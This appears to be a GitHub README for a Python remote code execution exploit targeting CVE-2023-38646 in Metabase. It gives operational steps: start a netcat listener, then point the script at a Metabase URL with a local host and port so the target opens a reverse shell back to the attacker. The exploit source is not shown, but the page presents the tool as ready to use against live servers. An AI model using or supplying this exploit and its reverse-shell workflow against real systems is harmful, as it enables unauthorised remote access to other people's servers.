CVE-2023-38646

A python RCE exploit for CVE-2023-38646

Usage

Start a Listner

nc -lvnp <port>

Run the exploit

python3 CVE-2023-38646.py -u <metabase_url> -l <local_ip> -p <local_port>

Help

python3 CVE-2023-38646.py -h

usage: CVE-2023-38646.py [-h] -u URL -l LHOST -p LPORT

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     URL to exploit (root path for metabase)
  -l LHOST, --lhost LHOST
                        LHOST for reverse shell
  -p LPORT, --lport LPORT
                        LPORT for reverse shell

About

RCE Exploit for CVE-2023-38646

MIT License

Languages

Language:Python 100.0%